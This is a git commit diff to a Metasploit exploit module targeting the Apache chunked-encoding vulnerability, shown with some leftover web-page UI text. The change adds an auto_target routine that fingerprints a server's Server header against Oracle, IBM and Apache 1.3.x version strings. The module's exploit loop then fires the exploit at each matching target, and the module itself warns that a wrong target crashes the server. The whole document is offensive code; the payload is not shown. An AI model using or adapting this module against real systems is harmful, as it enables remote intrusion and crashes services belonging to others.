add auto_target to apache_chunked exploit - should reduce run duration in most cases
git-svn-id: file:///home/svn/framework3/trunk@8980 4d416f70-5f16-0410-b530-b9f4589650daunstable
Joshua Drake
parent
776259e3c6
commit
eb003518ce
|
|
@ -9,10 +9,8 @@
|
|||
# http://metasploit.com/framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = GoodRanking
|
||||
|
||||
|
|
@ -35,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
automatically restart, so if you use the wrong target value,
|
||||
the server will crash.
|
||||
},
|
||||
'Author' => 'hdm',
|
||||
'Author' => [ 'hdm', 'jduck' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
|
|
@ -194,12 +192,82 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return code
|
||||
end
|
||||
|
||||
def auto_target
|
||||
response = send_request_raw({'uri' => '/'}, 5)
|
||||
targets_to_try = []
|
||||
|
||||
if response.nil?
|
||||
print_error("No response to request")
|
||||
return targets_to_try
|
||||
end
|
||||
|
||||
server_hdr = response['Server']
|
||||
print_status("Server: #{server_hdr}")
|
||||
|
||||
case server_hdr
|
||||
when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22"
|
||||
targets_to_try.push(targets[9])
|
||||
|
||||
when "Oracle HTTP Server Powered by Apache/1.3.12 (Win32) ApacheJServ/1.1 mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.24"
|
||||
targets_to_try.push(targets[10])
|
||||
|
||||
when "Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25"
|
||||
targets_to_try.push(targets[11])
|
||||
|
||||
when /IBM_HTTP_SERVER\/1\.3\.(19\.[3-9]|2[0-9]\.)/
|
||||
# fall through
|
||||
|
||||
else
|
||||
# check for apache version ranges
|
||||
if (server_hdr =~ /Apache\/([^ ]*)/) or (server_hdr =~ /Apache-AdvancedExtranetServer\/([^ ]*)/)
|
||||
version = $1
|
||||
|
||||
#print_status("Apache version: #{version}")
|
||||
ver = version.split('.')
|
||||
if (ver.length == 3)
|
||||
major = ver[0].to_i
|
||||
minor = ver[1].to_i
|
||||
rev = ver[2].to_i
|
||||
if (major == 1 and minor == 3)
|
||||
targets_to_try.push(targets[1]) if (rev >= 9 and rev <= 19)
|
||||
targets_to_try.push(targets[2]) if (rev >= 22 and rev <= 24)
|
||||
targets_to_try.push(targets[3]) if (rev >= 19 and rev <= 24)
|
||||
targets_to_try.push(targets[4]) if (rev == 22)
|
||||
|
||||
# Add the remaining targets, regardless of quality...
|
||||
if (server_hdr =~ /Win32/)
|
||||
# targets 4, 5, 6, 7
|
||||
if (rev >= 17 and rev <= 24)
|
||||
targets_to_try.push(targets[5])
|
||||
targets_to_try.push(targets[6])
|
||||
end
|
||||
targets_to_try.push(targets[7])
|
||||
targets_to_try.push(targets[8])
|
||||
end
|
||||
end
|
||||
# Version 1.0 - 1.2, Fall through...
|
||||
end
|
||||
# ServerTokens setting isn't giving up enough information ... Might need to try?
|
||||
end
|
||||
# Not Apache? Fall through...
|
||||
end
|
||||
|
||||
targets_to_try
|
||||
end
|
||||
|
||||
#
|
||||
# If auto, ask the auto_target function for a list of
|
||||
# targets to try...
|
||||
#
|
||||
# If not auto, just try the selected target.
|
||||
#
|
||||
def exploit
|
||||
if target_index == 0
|
||||
targets.each_with_index { |targ, idx|
|
||||
next if idx == 0
|
||||
targs = auto_target
|
||||
print_status("Auto-targeting returned #{targs.length} candidates...")
|
||||
targs.each_with_index { |targ, idx|
|
||||
# Never try the debug target automatically :)
|
||||
next if targ.name =~ /Debug/
|
||||
|
||||
exploit_target(targ)
|
||||
}
|
||||
else
|
||||
|
|
@ -257,4 +325,3 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
|
|||
Loading…
Reference in New Issue